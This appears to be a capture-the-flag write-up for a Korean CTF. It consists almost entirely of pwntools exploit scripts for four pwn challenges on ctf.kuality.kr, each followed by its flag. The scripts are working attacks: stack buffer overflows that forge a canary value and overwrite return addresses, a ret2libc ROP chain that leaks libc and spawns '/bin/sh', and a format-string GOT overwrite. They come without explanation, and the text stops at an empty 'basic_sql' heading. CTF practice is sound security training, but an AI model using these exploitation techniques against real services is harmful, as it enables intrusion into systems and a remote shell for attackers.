PWN

canary_cousin

from pwn import *

context.log_level ='debug'
r = remote('ctf.kuality.kr',12306)
e = ELF('./canary_cousin')

r.recvuntil("\\n")

pay = "A" * 256
pay += p32(0xCAFEBABE)
pay += "A" * 12
pay += p32(0x08049256)

r.sendline(pay)
r.interactive()

#KCTF{n0w_study_real_c4nary}

stage

stage

from pwn import *

context.log_level ='debug'
r = remote('ctf.kuality.kr',12308)
e = ELF('./stage')

stage2 = e.symbols['stage2']

r.recvuntil("Attack me.")

pay = "A" * 129
pay += "A" * 4
pay += p32(stage2)
r.sendline(pay)

r.recvuntil("me: ")

pay = "A" * 0x14
pay += p32(0xCAFEBABE)
r.sendline(pay)
r.interactive()

#KCTF{c4tch_me_1f_y0u_can_lol_}

CDC

from pwn import *

context.log_level = 'debug'
r = remote("ctf.kuality.kr",12311)
e = ELF("./CDC")
libc = e.libc

pr = 0x0000000000400703

read_got = e.got['read']
puts_plt = e.plt['puts']
vuln = e.symbols['vuln']

r.recvuntil("!!")

pay = "A" * 0x20
pay += "A" * 8
pay += p64(pr)
pay += p64(read_got)
pay += p64(puts_plt)
pay += p64(vuln)
r.sendline(pay)

libc_base = u64(r.recvuntil('\\x7f')[-6:] + "\\x00\\x00") - libc.symbols['read']
system = libc.symbols['system'] + libc_base
binsh = libc.search("/bin/sh").next() + libc_base
print (hex(libc_base))

pay = "A" * 0x20
pay += "A" * 8
pay += p64(0x0000000000400491) 
pay += p64(pr) 
pay += p64(binsh) 
pay += p64(system)
r.sendline(pay)

r.interactive()

#KCTF{C0r0n4_iS_fxxk1ng_Unc0mfort4bl3!}

FBI

from pwn import *

context.log_level = 'debug'
r = remote("ctf.kuality.kr",12307)
e = ELF("./FBI")

vuln = e.symbols['vuln']
puts_got = e.got['puts']

r.recvuntil("N.")
r.sendline("Y")
r.recvuntil("?")

pay = fmtstr_payload(1, {puts_got:vuln})

r.sendline(pay)
r.interactive()

#KCTF{d0_not_mistake_form4t_string_}

WEB

basic_sql